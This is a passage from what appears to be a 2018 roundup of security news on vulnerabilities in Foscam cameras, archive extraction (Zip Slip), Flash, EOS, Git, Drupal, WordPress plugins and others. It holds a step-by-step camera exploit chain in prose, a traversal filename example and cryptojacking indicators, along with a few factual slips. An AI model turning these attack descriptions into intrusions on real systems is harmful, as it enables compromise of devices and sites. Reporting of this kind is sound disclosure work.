Mishandling of CSP headers by your web browser could re-enable attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on any targeted web pages.
The patch for the vulnerability has already been rolled out to its users in a stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux operating system, which users may have already receive or will receive over the coming days/weeks.
So, make sure your system is running the updated version of Chrome web browser. We'll update the article, as soon as Google releases further update.
Firefox has also released its new version of the Firefox web browser, version 60.0.2, which includes security and bug fixes. So, users of the stable version of Firefox are also recommended to update their browser.


Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs
Vulnerebility

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The following flaws were reported by the experts from IoT security firm VDOO:

CVE-2018-6830
CVE-2018-6831
CVE-2018-6832
chaining the three flaw the hackers could completely take over the Foscam cameras.

The experts from VDOO has published a technical analysis of the three vulnerabilities, including a proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below the attack scenario described by VDOO on a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.
Foscam Internet-connected cameras

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions, users urge to update the firmware as soon as possible.

Likely many other camera models from other vendors could be affected by the vulnerabilities because Foscam also provides its products in white-label mode.


Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek
Vulnerebility

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by the Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the attacker needs to extract the archive, either using a library or own code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.


Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek
Vulnerebility

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player, 30.0.0.113, also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-500 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.


Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews 
Vulnerebility

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of Vulcan team and Zhiniang Peng of Core security team—the vulnerability is a buffer out-of-bounds write issue which resides in the function used by nodes server to parse contracts.


To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in EOS network—servers that collect transaction information and pack it into blocks.
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."


Since the super node system can be controlled, the researchers said the attackers can "do whatever they want," including, controlling the virtual currency transactions, and acquiring other financial and privacy data in the EOS network participating node systems, such as an exchange Digital currency, the user's key stored in the wallet, key user profiles, privacy data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researcher can bypass multiple default security mitigation measures to achieve complete control over the super node running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 ​​security team has previously discovered and disclosed multiple relevant high risk vulnerabilities,"
The researchers believe the new type of vulnerabilities affect not only EOS alone but also other types of Blockchain platforms and virtual currency applications.


Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek
Vulnerebility

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

However, landave has found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim attached to an email, but this attack scenario required that the recipient manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.


Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs
Vulnerebility

Two months after the release of the security updates for the drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.
In March, the Drupal developers Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka drupalgeddon2, affecting Drupal 7 and 8 versions.

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

Two months after the release of the security updates, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.

According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that have installed security patched for drupalgeddon2 vulnerability.

The experts scanning the Internet for websites running Drupal 7.x CMS version found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon 2 flaw. The scan didn’t search for 6.x and 8.x sites.
“How many Drupal sites are vulnerable?To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”
Drupalgeddon2

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report,

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

Bad Packets Report
@bad_packets
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign.

9:37 AM - May 31, 2018
15
See Bad Packets Report's other Tweets
Twitter Ads info and privacy

Bad Packets Report
@bad_packets
31 May
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign. pic.twitter.com/dJbqshysUg

Bad Packets Report
@bad_packets
This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used. pic.twitter.com/a9dxCfbR3s

9:37 AM - May 31, 2018

5
See Bad Packets Report's other Tweets
Twitter Ads info and privacy
The expert published IoCs for the campaign, the presence online of 115,000 of Drupal 7.x web sites is very danger, a gift for crooks that can abuse them for a broad range of illegal activities.


‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs
Vulnerebility

Security experts from British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’ that affects thousands of projects across many industries.
The flaw, that remained hidden for years, could be exploited by attackers to execute arbitrary code on the vulnerable systems.

zip slip

The Zip Slip is an arbitrary file overwrite vulnerability that could be triggered with a directory traversal attack while extracting files from an archive,

Unfortunately, the flaw affects many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (i.e. JavaScript, Ruby, Java, .NET and Go) from tech giants include vulnerable libraries and codes.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file that holds directory traversal filenames (e.g. ../../evil.sh).
Once a vulnerable code o library has extracted the content of the archive, it would allow attackers to unarchive malicious files outside of the folder where it should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

Experts shared two sample examples of malicious zip and tar files (for both Unix and windows files systems) with filenames that extract a file to the /tmp/ or \Temp\ folders

Since April, Snyk privately reported the flaw to the maintainers of all vulnerable libraries and projects, it is maintaining a GitHub repository listing all flawed projects. The repository is open to contributions from the wider community to ensure it holds the most up to date status.


Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs
Vulnerebility

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.
Crooks recently added the code for an Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago, it affects VBScript implemented in Internet Explorer and Microsoft Office.

Researchers from Advanced Threat Response Team of 360 Core Security Division first reported the zero-day

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the vulnerability as “double kill” exploit.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Experts released a Metasploit module for the exploitation of the CVE-2018-8174 once the PoC code was available online.

The availability of the PoC code for the vulnerability is a gift for vxers, in the specific case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now beeing integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from july 2016 and might shake the Drive-By landscape for the coming months.”

CVE-2018-8174 RIG

Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals were hijacking the traffic of legitimate sites and redirecting IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a tiny dropper used to install on the infected system a cryptocurrency miner.

CVE-2018-8174 RIG exploit kit monero-miner-1


Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek
Vulnerebility

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version 4.0.3.1.

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.


WordPress Disables Plugins That Expose e-Commerce Sites to Attacks

2.6.2018 securityweek Vulnerebility

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.


Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs
Vulnerebility

Researchers at ThreatPress firm discovered security vulnerabilities in ten WordPress plugins developed by Multidots, a company for e-commerce websites.
The vulnerable plugins are available on theWordPress.org and implement a set of features for WooCommerce installations that allow admins to manage their online shops, nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins designed to work alongside with WooCommerce so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”

closed wordpress plugins multidots

Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws were tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632, they could allow attackers to power a broad range of attacks, such as installing cryptocurrency miners or install exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

The researchers at ThreatPress reported the flaw to Multidots on May 8, the company acknowledged the flaws but at the time it still hasn’t solved the flaws.

ThreatPress published technical details for the vulnerabilities and for each of them a proof-of-concept (PoC) code.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek 
Vulnerebility

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specially for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.


CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs
Vulnerebility  

The Git community disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates in a malicious repository.
The Git developer team and other firms offering Git repository hosting services have issued security updates to address a remote code execution vulnerability, tracked as CVE-2018-11235 in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone –recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

The Git 2.17.1 addressed the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

The CVE-2018-11235 could be exploited by an attacker to set up a malformed Git repository containing a specially-built Git submodule. The attacker needs to trick victims into clone the rogue repository to execute arbitrary code on users’ systems.

The problem resides in the way the Git client handles the specially-built Git submodule.

The release also includes the support for Git server-side component that could be used by Git hosting services to detect code repositories containing malicious submodules and prevent their upload.

“In addition to the above fixes, this release adds support on the server side that reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release note for the v2.17.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targetting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”

Major Git hosting services like GitHub and Microsoft have already installed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encourages all users to update their Git clients as soon as possible.

Thomson published a technical analysis for the CVE-2018-11235 vulnerability.


Expert found a zero-day RCE in Microsoft Windows JScript component
30.5.2018 securityaffairs
Vulnerebility  

Dmitri Kaslov, a security researcher at Telspace Systems, discovered a vulnerability in the JScript component of the Windows operating system that can be exploited by an attacker to execute malicious code on a target computer.
Kaslov disclosed the zero-day flaw through the Trend Micro Zero-Day Initiative (ZDI) back in January, then ZDI experts reported it to Microsoft.

After four months Microsoft has yet to roll out a patch to address the flaw so ZDI decided to publish a part of the technical analysis of the vulnerability.

ZDI usually waits 120 days before publicly disclose a flaw.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” reads the advisory published by ZDI.

“The specific flaw exists within the handling of Error objects in JScript. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.”

The vulnerability received a 6.8 rating out of 10 on the CVSSv2 severity scale.

Microsoft Windows JScript component

To exploit the vulnerability, the attacker has to trick victims into accessing a malicious web page, or download and open a malicious JS file on the system.

The good news is that the vulnerability does not allow a full system compromise because attackers can execute malicious code only within a sandboxed environment.

Of course, an attacker can chain this vulnerability with a sandbox bypass exploit and then execute its own code on the target system.

Anyway, Microsoft is working on a security update

Below the timeline for the vulnerability:

01/23/18 – ZDI sent the vulnerability report to the vendor
01/23/18 – The vendor acknowledged and provided a case number
04/23/18 – The vendor replied that they were having difficulty reproducing the issue report without POC
04/24/18 – ZDI confirmed the POC was sent with the original and sent it again
05/01/18 – The vendor acknowledged receipt of the POC
05/08/18 – The vendor requested an extension
05/18/18 – ZDI replied “We have verified that we sent the POC with the original. The report will 0-day on May 29.”

ZDI confirmed that it is was not aware of attempts in the wild to exploit this vulnerability.


Remote Code Execution Vulnerability Patched in Git
30.5.2018 securityweek 
Vulnerebility 

Updates released on Tuesday for the Git version control system patch two security flaws, including a serious vulnerability that can be exploited for remote code execution using specially crafted repositories.

The security holes, tracked as CVE 2018-11235 and CVE 2018-11233, have been addressed with the release of Git v2.17.1, v2.13.7, v2.14.4, v2.15.2 and v2.16.4.

The more serious of them, CVE 2018-11235, is related to submodule names and recursively cloning repositories. The issue was discovered by Etienne Stalmans, who reported it through GitHub’s bug bounty program.

Microsoft’s Visual Studio Team Services (VSTS) team has provided some information about the vulnerability, instructions on how users can check if they are impacted, and the steps that need to be taken to mitigate the risks on each platform.

Edward Thomson, a program manager for Git in the Microsoft Visual Studio Team Service, has provided the following description for the vulnerability:

“When a Git repository contains a submodule, that submodule's repository structure is stored alongside the parent's, inside the .git folder. This structure is generally stored in a folder with the same name as the submodule, however the name of this folder is configurable by a file in the parent repository.

